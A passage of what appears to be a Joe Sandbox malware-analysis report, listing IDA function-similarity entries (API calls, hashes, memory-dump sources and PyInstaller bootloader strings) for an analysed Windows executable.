                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                              • String ID: P%
                                                                                                                                                                                                                                              • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                              • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                              • Instruction ID: 46fc1f4ccb1474852cc9f4fe89bbc49f8b1fa66c052088270278482ea0f44b78
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0351E876604BA186DA349F2AF8181BAB7A1F798B61F004125EFDF83694DF7CD085DB10
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                                              • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                                              • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                                              • Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                              • Instruction ID: 58c842badf6d958e47ae5fd5c628e2b6cd9f2abeeaf88c6d44f8f795cbda9130
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A1219161B09A8286EF458B7EBC491796254FF99FB0F584331DE2EC3394DF6CD590820A
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: -$:$f$p$p
                                                                                                                                                                                                                                              • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                              • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                              • Instruction ID: a59d2eb9e0c1bfefa1bdff49e8a6065b577ecdf93e17dd52da3a8f57425589c3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BE129471E0C26386FF205B14D95E67976A2FB50770F844136EE8987AC4DF3CE9A08B16
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: f$f$p$p$f
                                                                                                                                                                                                                                              • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                              • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                              • Instruction ID: e8a643046ec8364d39d7899dceab3667915c4dda962fd032ec5b0fb8bd0b14bc
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 94128462E0C14386FF245E14EC5A77976A1FB41774FE48135EA9A879C4DF7CE4A08B02
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                                              • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                              • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                              • Opcode ID: d867eea9b736dd05fb7db999da78ff363ac8c1b1cc00f418ae9ba02d40a40477
                                                                                                                                                                                                                                              • Instruction ID: cfa4bf5834d1cb3063852b2fe82e2636f6180bf66d6db2846a27d932344d0acc
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d867eea9b736dd05fb7db999da78ff363ac8c1b1cc00f418ae9ba02d40a40477
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7141C161B086528AFE00EB1AAC466B96390FF44FE0F444432ED0CC7796DF3DE9818346
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                                              • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                              • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                              • Opcode ID: b80b08f7cfde0f81c8538706a0795345a627625e20aad4e8d4f4917b79e24954
                                                                                                                                                                                                                                              • Instruction ID: 6c1234c1b90261470ee2a4985630d516fa58d74deb0e6636dd3dc29cebe74210
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b80b08f7cfde0f81c8538706a0795345a627625e20aad4e8d4f4917b79e24954
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2F41D261B0C6428AEF01DB25DC421B96390FF84BA4F444432ED4D87B95DF3DE992C74A
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                              • String ID: csm$csm$csm
                                                                                                                                                                                                                                              • API String ID: 849930591-393685449
                                                                                                                                                                                                                                              • Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                                              • Instruction ID: 722620e8f7bca7ae4c62cb52f5d97fcb6d4cfd0f9f36ee603dd409f7f3c6af98
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8ED17032A087818AEF20DF2598413AD77A0FB457A8F140135EE9D97B9ACF39E0D1C746
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF62C0F3706,?,00007FF62C0F3804), ref: 00007FF62C0F2C9E
                                                                                                                                                                                                                                              • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF62C0F3706,?,00007FF62C0F3804), ref: 00007FF62C0F2D63
                                                                                                                                                                                                                                              • MessageBoxW.USER32 ref: 00007FF62C0F2D99
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                                              • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                                              • API String ID: 3940978338-251083826
                                                                                                                                                                                                                                              • Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                                              • Instruction ID: 86ae82494796241eec8c030b2adb68636609e58a481904699e42cec4fd752ebc
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FE312672B08B4046EF20AB29BC152AA6695BF88BE8F400136EF4DD3759EF3DD546C345
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF62C0FDF7A,?,?,?,00007FF62C0FDC6C,?,?,?,00007FF62C0FD869), ref: 00007FF62C0FDD4D
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF62C0FDF7A,?,?,?,00007FF62C0FDC6C,?,?,?,00007FF62C0FD869), ref: 00007FF62C0FDD5B
                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF62C0FDF7A,?,?,?,00007FF62C0FDC6C,?,?,?,00007FF62C0FD869), ref: 00007FF62C0FDD85
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF62C0FDF7A,?,?,?,00007FF62C0FDC6C,?,?,?,00007FF62C0FD869), ref: 00007FF62C0FDDF3
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF62C0FDF7A,?,?,?,00007FF62C0FDC6C,?,?,?,00007FF62C0FD869), ref: 00007FF62C0FDDFF
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                              • String ID: api-ms-
                                                                                                                                                                                                                                              • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                              • Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                              • Instruction ID: 64fc88088f0d49555f460cf314bb8f2f1eacb566aae9c479917a49c5146b055a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3E31D421B1A74299EE12DF06AC006B923E4FF58BB4F594535ED1D87384EF3DE484832A
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                                              • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                              • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                                              • Opcode ID: bd35b640c02035bc0e077a05b147b005ab0e639f37cafda848bc65a29b3ec2f1
                                                                                                                                                                                                                                              • Instruction ID: e64f00e6ef61235a7718a6f33f147781fcb48ef12a3d73405ea77d3c2d684b73
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bd35b640c02035bc0e077a05b147b005ab0e639f37cafda848bc65a29b3ec2f1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0E419221A18A8695EE21EB64EC152E96311FF543A0F800132DE5CC36D5EF7DF689C746
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF62C0F351A,?,00000000,00007FF62C0F3F1B), ref: 00007FF62C0F2AA0
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                                              • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                              • API String ID: 2050909247-2900015858
                                                                                                                                                                                                                                              • Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                                              • Instruction ID: 6044575e71d00e65264cb3e3816727449ea070c0a7c1d4663241f63a3d3b7f1a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9921B272A18B8186EB20DB55BC867E66394FB887E4F400136FE8C83659DF7CD2858745
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Value$ErrorLast
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2506987500-0
                                                                                                                                                                                                                                              • Opcode ID: a42b9cf7ed1ffe71ebcf97f5a72f2c90d2921d4b6bb9ef7954fc9d2fe8c6feaf
                                                                                                                                                                                                                                              • Instruction ID: 3915a7cde2db868862b4d48efa27c30027c4c8515d8731f4f2ef2bd4d12fe783
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a42b9cf7ed1ffe71ebcf97f5a72f2c90d2921d4b6bb9ef7954fc9d2fe8c6feaf
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 57212C24B0C68281FE58A325AE5F13962525F4A7B0F144634DD7EC6ACAEE3DB4608303
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                              • String ID: CONOUT$
                                                                                                                                                                                                                                              • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                              • Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                                              • Instruction ID: f5b20213c2993350d6523f7d901f06bbbee1cccb359ffe2672accee5f38b1499
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B119321B18A4186EB508B5AFC5A32963A0FF99BF4F040234EA5DC7794DFBCE8148742
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF62C0F3FA9), ref: 00007FF62C0F8EFD
                                                                                                                                                                                                                                              • K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF62C0F3FA9), ref: 00007FF62C0F8F5A
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF62C0F45F4,00000000,00007FF62C0F1985), ref: 00007FF62C0F93C9
                                                                                                                                                                                                                                              • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF62C0F3FA9), ref: 00007FF62C0F8FE5
                                                                                                                                                                                                                                              • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF62C0F3FA9), ref: 00007FF62C0F9044
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF62C0F3FA9), ref: 00007FF62C0F9055
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF62C0F3FA9), ref: 00007FF62C0F906A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3462794448-0
                                                                                                                                                                                                                                              • Opcode ID: 0184f5a771bb2c28f933eba3e4018dda16e38d059dd6d010c17659477659ba58
                                                                                                                                                                                                                                              • Instruction ID: 44356a712a68c97eadaba6ecb8119595440f666e91318339acc210f2a1d39689
